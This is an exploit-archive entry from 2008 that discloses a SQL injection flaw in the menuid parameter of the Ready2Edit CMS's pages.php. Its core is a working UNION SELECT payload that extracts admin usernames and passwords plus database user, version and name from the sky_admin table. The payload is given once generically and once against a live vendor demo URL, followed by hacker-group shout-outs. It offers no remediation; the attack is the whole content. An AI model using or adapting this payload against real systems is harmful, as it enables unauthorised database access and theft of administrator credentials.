id: 3270
date: 06/22/2008
title: Ready2Edit (pages.php menuid) Remote SQL Injection Vulnerability
author: Mr.SQL
cves: 

================================================================
Ready2Edit (pages.php menuid) Remote SQL Injection Vulnerability
================================================================



#########################################################################
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## Ready2Edit ( pages.php menuid )
##
#########################################################################
########################
##
## Script  : Ready2Edit
##
## site    : www.skylinewebnapps.com
##
########################
########################
##
##  -(:: SQL ::)-
##
##    www.site.com/
##            pages.php?menuid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,concat_ws(0x3a,user(),version(),database())+from+sky_admin/*
##
##  -(:: L!VE DeMo ::)-
##
##    http://demo.skylinewebnapps.com/Ready2Edit/pages.php?menuid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,concat_ws(0x3a,user(),version(),database())+from+sky_admin/*
##
#######################
#######################

#######################################################################################################
#######################################################################################################

                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
                                         
 :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS ::
#######################################################################################################
#######################################################################################################



#  0day.today [2023-03-23]  #